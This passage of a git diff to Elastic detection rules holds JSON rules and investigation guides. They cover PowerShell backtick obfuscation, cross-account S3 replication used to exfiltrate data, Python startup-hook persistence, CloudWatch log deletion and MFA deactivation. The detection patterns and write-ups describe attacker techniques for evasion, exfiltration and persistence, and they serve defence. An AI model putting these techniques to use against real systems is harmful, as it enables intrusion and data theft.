operational needs.\n\n### Investigating Potential PowerShell Obfuscation via Backtick-Escaped Variable Expansion\n\nPowerShell, a powerful scripting language in Windows environments, can be exploited by adversaries using obfuscation techniques like backtick-escaped variable expansion to evade detection. This method involves disguising malicious scripts to bypass security measures. The detection rule identifies scripts with excessive length and specific obfuscation patterns, flagging potential threats for further analysis.\n\n### Possible investigation steps\n\n- Review the `powershell.file.script_block_text` field to understand the content of the script and identify any suspicious or malicious commands.\n- Examine the `file.path` and `file.name` fields to determine the origin and context of the script execution, which may provide insights into whether the script is part of a legitimate process or potentially malicious activity.\n- Check the `host.name` and `agent.id` fields to identify the affected system and correlate with other security events or logs from the same host for additional context.\n- Analyze the `user.id` field to determine which user account executed the script, and assess whether this activity aligns with the user's typical behavior or role.\n- Investigate the `powershell.file.script_block_id` and `powershell.sequence` fields to trace the execution flow of the script and identify any related script blocks that may have been executed in sequence.\n- Consider the `count` field to evaluate the extent of obfuscation used in the script, which may indicate the level of sophistication or intent behind the script.\n\n### False positive analysis\n\n- Scripts with legitimate administrative functions may use backtick-escaped variable expansion for complex string manipulations. Review the script's context and purpose to determine if it aligns with expected administrative tasks.\n- Automated scripts generated by trusted software might include obfuscation patterns as part of their normal operation. Verify the source and integrity of the software to ensure it is from a reputable vendor.\n- Developers and IT professionals may use obfuscation techniques during testing or development phases. Establish a process to whitelist known development environments or user accounts to reduce unnecessary alerts.\n- PowerShell scripts that are part of legitimate security tools or monitoring solutions may trigger the rule. Identify and exclude these tools by their file path or script block ID to prevent false positives.\n- Regularly update the list of known false positives based on historical data and feedback from users to refine the detection rule and improve its accuracy.\n\n### Response and remediation\n\n- Isolate the affected host immediately to prevent further spread of the potentially malicious script across the network.\n- Terminate any suspicious PowerShell processes identified by the alert to halt the execution of obfuscated scripts.\n- Conduct a thorough review of the script block text and associated file paths to identify and remove any malicious scripts or files from the system.\n- Reset credentials for any user accounts involved in the alert to mitigate the risk of compromised credentials being used for further attacks.\n- Escalate the incident to the security operations team for a deeper investigation into potential lateral movement or additional compromised systems.\n- Implement enhanced monitoring on the affected host and similar systems to detect any recurrence of obfuscation techniques or related suspicious activities.\n- Update endpoint protection and intrusion detection systems with indicators of compromise (IOCs) derived from the analysis to improve detection capabilities for similar threats in the future.\n", + "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// Filter out smaller scripts that are unlikely to implement obfuscation using the patterns we are looking for\n| eval Esql.script_block_length = length(powershell.file.script_block_text)\n| where Esql.script_block_length > 500\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(powershell.file.script_block_text, \"\"\"\\$\\{(\\w++`){2,}\\w++\\}\"\"\", \"\ud83d\udd25\")\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_length,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n file.name,\n powershell.sequence,\n powershell.total,\n _id,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts that match the pattern at least once\n| where Esql.script_block_pattern_count >= 1\n", + "related_integrations": [ + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.script_block_length", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.script_block_pattern_count", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.script_block_tmp", + "type": "keyword" + }, + { + "ecs": false, + "name": "_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "_index", + "type": "keyword" + }, + { + "ecs": true, + "name": "agent.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_entropy_bits", + "type": "double" + }, + { + "ecs": false, + "name": "powershell.file.script_block_hash", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_length", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.file.script_block_surprisal_stdev", + "type": "double" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "text" + }, + { + "ecs": false, + "name": "powershell.file.script_block_unique_symbols", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.sequence", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.total", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "d43f2b43-02a1-4219-8ce9-10929a32a618", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 5 + }, + "id": "d43f2b43-02a1-4219-8ce9-10929a32a618_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d488f026-7907-4f56-ad51-742feb3db01c_5.json b/packages/security_detection_engine/kibana/security_rule/d488f026-7907-4f56-ad51-742feb3db01c_5.json new file mode 100644 index 00000000000..6e42b3da351 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d488f026-7907-4f56-ad51-742feb3db01c_5.json @@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or modification of an S3 bucket replication configuration that sends data to a bucket in a different AWS account. Cross-account replication can be used legitimately for backup, disaster recovery, and multi-account architectures, but adversaries with write access to an S3 bucket may abuse replication rules to silently exfiltrate large volumes of data to attacker-controlled accounts. This rule detects \"PutBucketReplication\" events where the configured destination account differs from the source bucket's account, indicating potential unauthorized cross-account data movement.", + "event_category_override": "event.type", + "false_positives": [ + "Cross-account S3 replication is common in multi-account AWS Organizations, centralized logging architectures, and disaster-recovery designs. Confirm whether the destination account is an approved replication target. Unexpected replication configuration changes should be treated as suspicious." + ], + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.access_key_id", + "aws.cloudtrail.resources.arn", + "aws.cloudtrail.resources.type", + "target.entity.id", + "event.action", + "event.outcome", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.request_parameters" + ] + }, + "language": "eql", + "license": "Elastic License v2", + "name": "AWS S3 Bucket Replicated to Another Account", + "note": "## Triage and analysis\n\n### Investigating AWS S3 Bucket Replicated to Another Account\n\nCross-account S3 replication enables automated copying of S3 objects into a different AWS bucket. While useful for backup and organizational data flows, adversaries may exploit it as a covert exfiltration channel. Once replication is configured, any future writes to the bucket are silently copied to the destination bucket\u2014even if object-level access controls block the attacker\u2019s direct downloads. For this reason, unauthorized replication configuration should be considered high-risk.\n\nThis rule detects successful `PutBucketReplication` events and flags cases where the replication configuration specifies a destination AWS account different from the source.\n\n#### Possible investigation steps\n\n**Understand who initiated the replication change**\n- Inspect `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id` to identify the actor.\n- Review authentication patterns such as federated session names, role chaining via STS, or unfamiliar IAM roles.\n- Examine `source.ip`, `source.geo` fields, and `user_agent.original` for unusual locations, automation tools, or anomalous access paths.\n\n**Examine the replication rule details**\n- Inspect `aws.cloudtrail.request_parameters` for:\n - The **destination account ID** (`Account=`).\n - The **IAM role ARN** used for replication. (`Role=`)\n - Any filtering rules (prefixes, tags) that narrow or broaden what will be replicated.\n\n**Determine whether the destination account is authorized**\n- Validate whether the destination AWS account belongs to your AWS Organization.\n- Check internal documentation, IaC templates, or tagging standards to confirm whether replication to this account is expected.\n- Look for prior legitimate infrastructure workflows such as:\n - Centralized logging\n - Backup/DR accounts\n - Cross-region compliance replicas\n\nUnrecognized accounts should be treated as a strong exfiltration signal.\n\n**Assess the scope of potential data exposure**\n- Determine whether the bucket contains sensitive or regulated data (PII, financial records, secrets, logs, etc.).\n- Identify whether object versioning, lifecycle rules, or access logging were modified recently.\n- Check for preceding or subsequent actions such as:\n - `PutBucketPolicy` updates granting new principals access\n - Creation or modification of IAM roles tied to replication\n - `DeleteObject` or `PutObjectRetention` attempts that might pair with exfiltration\n\n**Correlate with other suspicious activity**\nPivot in CloudTrail on the same principal or same bucket:\n- Prior reconnaissance such as `ListBuckets`, `GetBucketReplication`, or `GetBucketPolicy`\n- Modification of KMS policies or unexpected encryption key usage\n- New access patterns from external IP addresses or unusual automation\n\n### False positive analysis\n\n**Legitimate cross-account replication**\nValidate:\n- The destination account belongs to a known OU or business unit\n- The replication role ARN matches expected automation\n- The change aligns with documented deployment or maintenance schedules\n\n**Temporary migrations or transitions**\nDuring account restructuring or workload migration, administrators may temporarily redirect replication to new accounts.\n\nTuning options:\n- Exception lists based on IAM role ARNs\n- Tag-based environment scoping\n- Change-window-based suppression\n\n### Response and remediation\n\n**Contain potential exfiltration**\n- Remove or update replication rules to eliminate unauthorized destinations.\n- Disable or restrict the replication IAM role until the investigation is complete.\n- Review S3 object access logs to determine whether data has begun replicating to the external account.\n\n**Investigate scope and impact**\n- Identify the volume and types of data at risk of replication.\n- Determine whether the external bucket shows successful replication traffic (if logs or access are available).\n- Assess whether the actor also modified bucket policies, encryption settings, or KMS keys.\n\n**Credential and role hygiene**\n- Rotate credentials for the initiating user or role if compromise is suspected.\n- Review IAM role trust policies, especially if STS sessions or EC2 role assumptions were involved.\n- Enable MFA and tighten conditions for administrative roles capable of modifying replication.\n\n**Hardening and preventive controls**\n- Enforce SCPs that restrict cross-account replication except for explicitly approved destinations.\n- Require approval workflows before modifying replication or retention settings.\n- Use AWS Config and Security Hub controls to detect:\n - Buckets with unexpected replication rules\n - Newly added cross-account permissions\n - Changes to bucket policies, block-public-access settings, or KMS key policies\n\n### Additional information\n\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/)** \n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs)** \n- **Security Best Practices:** [AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/).\n", + "query": "info where event.dataset == \"aws.cloudtrail\"\n and event.action == \"PutBucketReplication\"\n and event.outcome == \"success\"\n and stringContains(aws.cloudtrail.request_parameters, \"Account=\")\n", + "references": [ + "https://docs.aws.amazon.com/AmazonS3/latest/userguide/replication-walkthrough-2.html/", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketReplication.html/" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.request_parameters", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d488f026-7907-4f56-ad51-742feb3db01c", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS S3", + "Resources: Investigation Guide", + "Use Case: Threat Detection", + "Tactic: Exfiltration" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1537", + "name": "Transfer Data to Cloud Account", + "reference": "https://attack.mitre.org/techniques/T1537/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "d488f026-7907-4f56-ad51-742feb3db01c_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_209.json b/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_209.json deleted file mode 100644 index 47e56da4e5f..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_209.json +++ /dev/null @@ -1,112 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the deletion of an AWS CloudWatch log stream, which permanently deletes all associated archived log events with the stream.", - "false_positives": [ - "A log stream may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Log stream deletions by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-60m", - "index": [ - "filebeat-*", - "logs-aws.cloudtrail-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "AWS CloudWatch Log Stream Deletion", - "note": "## Triage and analysis\n\n### Investigating AWS CloudWatch Log Stream Deletion\n\nAmazon CloudWatch is a monitoring and observability service that collects monitoring and operational data in the form of logs, metrics, and events for resources and applications. This data can be used to detect anomalous behavior in your environments, set alarms, visualize logs and metrics side by side, take automated actions, troubleshoot issues, and discover insights to keep your applications running smoothly.\n\nA log stream is a sequence of log events that share the same source. Each separate source of logs in CloudWatch Logs makes up a separate log stream.\n\nThis rule looks for the deletion of a log stream using the API `DeleteLogStream` action. Attackers can do this to cover their tracks and impact security monitoring that relies on these sources.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance?\n- Investigate the deleted log stream's criticality and whether the responsible team is aware of the deletion.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "event.dataset:aws.cloudtrail and event.provider:logs.amazonaws.com and event.action:DeleteLogStream and event.outcome:success\n", - "references": [ - "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/logs/delete-log-stream.html", - "https://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_DeleteLogStream.html" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17", - "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS CloudWatch", - "Use Case: Log Auditing", - "Tactic: Impact", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0040", - "name": "Impact", - "reference": "https://attack.mitre.org/tactics/TA0040/" - }, - "technique": [ - { - "id": "T1485", - "name": "Data Destruction", - "reference": "https://attack.mitre.org/techniques/T1485/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.001", - "name": "Disable or Modify Tools", - "reference": "https://attack.mitre.org/techniques/T1562/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 209 - }, - "id": "d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_209", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_210.json b/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_210.json index 4ef06c9f499..d1c5659d564 100644 --- a/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_210.json +++ b/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_210.json @@ -24,7 +24,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_210.json b/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_210.json index 3bb519c19de..16ce71048df 100644 --- a/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_210.json +++ b/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_210.json @@ -23,7 +23,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/d788313c-9e0b-4c5a-8c4b-c3f05a47d5a8_4.json b/packages/security_detection_engine/kibana/security_rule/d788313c-9e0b-4c5a-8c4b-c3f05a47d5a8_4.json new file mode 100644 index 00000000000..cb6989fc79e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d788313c-9e0b-4c5a-8c4b-c3f05a47d5a8_4.json @@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects the creation and modification of sitecustomize.py and usercustomize.py, which Python automatically executes on startup. Attackers can exploit these files for persistence by injecting malicious code. The rule monitors system-wide, user-specific, and virtual environment locations to catch unauthorized changes that could indicate persistence or backdooring attempts.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Python Site or User Customize File Creation", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Python Site or User Customize File Creation\n\nPython's `sitecustomize.py` and `usercustomize.py` are scripts that execute automatically when Python starts, allowing for environment-specific customizations. Adversaries can exploit these files to maintain persistence by injecting malicious code. The detection rule monitors file creation and modification in key directories, excluding benign processes, to identify unauthorized changes indicative of potential backdooring or persistence attempts.\n\n### Possible investigation steps\n\n- Review the file path where the creation or modification was detected to determine if it is a system-wide, user-specific, or virtual environment location, as specified in the query.\n- Identify the process executable responsible for the file creation or modification and verify if it is listed in the exclusion list of benign processes. If not, investigate the process for potential malicious activity.\n- Check the timestamp of the file creation or modification event to correlate with any other suspicious activities or alerts on the system around the same time.\n- Examine the contents of the sitecustomize.py or usercustomize.py file for any unauthorized or suspicious code that could indicate persistence mechanisms or backdooring attempts.\n- Investigate the user account associated with the file creation or modification event to determine if the activity aligns with expected behavior or if it suggests potential compromise.\n- Review system logs and other security alerts for additional context or indicators of compromise related to the detected event.\n\n### False positive analysis\n\n- Package managers like pip and poetry can trigger false positives when they create or modify sitecustomize.py or usercustomize.py during package installations or updates. To handle this, ensure these processes are included in the exclusion list within the detection rule.\n- System updates or software installations that involve Python libraries might also lead to false positives. Regularly review and update the exclusion list to include known benign processes such as pacman or restic that are part of routine system maintenance.\n- Custom scripts or automation tools that use Python to manage environments could inadvertently modify these files. Identify and exclude these specific scripts or tools if they are verified as non-malicious.\n- Virtual environments often involve the creation of sitecustomize.py for environment-specific configurations. Consider excluding the virtual environment's Python executables if they are part of a controlled and secure development process.\n\n### Response and remediation\n\n- Isolate the affected system from the network to prevent further unauthorized access or spread of malicious code.\n- Review the contents of the `sitecustomize.py` and `usercustomize.py` files for any unauthorized or suspicious code. Remove any malicious code identified.\n- Restore the affected files from a known good backup if available, ensuring that the restored files are free from unauthorized modifications.\n- Conduct a thorough scan of the system using updated antivirus or endpoint detection and response (EDR) tools to identify and remove any additional malware or persistence mechanisms.\n- Monitor the system and network for any signs of continued unauthorized access or attempts to modify the `sitecustomize.py` and `usercustomize.py` files.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.\n- Implement additional monitoring and alerting for changes to critical Python directories and files to enhance detection of similar threats in the future.\n", + "query": "file where host.os.type == \"linux\" and event.type in (\"creation\", \"rename\") and process.executable != null and\nfile.path like~ (\n \"/usr/lib/python*/sitecustomize.py\",\n \"/usr/local/lib/python*/sitecustomize.py\",\n \"/usr/lib/python*/dist-packages/sitecustomize.py\",\n \"/usr/local/lib/python*/dist-packages/sitecustomize.py\",\n \"/opt/*/lib/python*/sitecustomize.py\",\n \"/home/*/.local/lib/python*/site-packages/usercustomize.py\",\n \"/home/*/.config/python/usercustomize.py\"\n) and not (\n process.executable in (\n \"/usr/local/bin/pip2\", \"/usr/bin/restic\", \"/usr/bin/pacman\", \"/usr/bin/dockerd\", \"/usr/local/bin/pip3\",\n \"/usr/bin/pip3\", \"/usr/local/bin/pip\", \"/usr/bin/pip\", \"/usr/bin/podman\", \"/usr/local/bin/poetry\",\n \"/usr/bin/poetry\", \"/usr/bin/pamac-daemon\", \"./venv/bin/pip\"\n ) or\n process.executable like~ (\n \"/usr/bin/python*\", \"/usr/local/bin/python*\", \"/opt/venv/bin/python*\",\n \"/nix/store/*libexec/docker/dockerd\", \"/snap/docker/*dockerd\"\n )\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "d788313c-9e0b-4c5a-8c4b-c3f05a47d5a8", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.018", + "name": "Python Startup Hooks", + "reference": "https://attack.mitre.org/techniques/T1546/018/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "d788313c-9e0b-4c5a-8c4b-c3f05a47d5a8_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_210.json b/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_210.json deleted file mode 100644 index 7ff4f384dbe..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958_210.json +++ /dev/null @@ -1,113 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic", - "Austin Songer" - ], - "description": "Identifies the deactivation of a specified multi-factor authentication (MFA) device and removes it from association with the user name for which it was originally enabled. In AWS Identity and Access Management (IAM), a device must be deactivated before it can be deleted.", - "false_positives": [ - "A MFA device may be deactivated by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. MFA device deactivations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-60m", - "index": [ - "filebeat-*", - "logs-aws.cloudtrail-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "AWS IAM Deactivation of MFA Device", - "note": "## Triage and analysis\n\n### Investigating AWS IAM Deactivation of MFA Device\n\nMulti-factor authentication (MFA) in AWS is a simple best practice that adds an extra layer of protection on top of your user name and password. With MFA enabled, 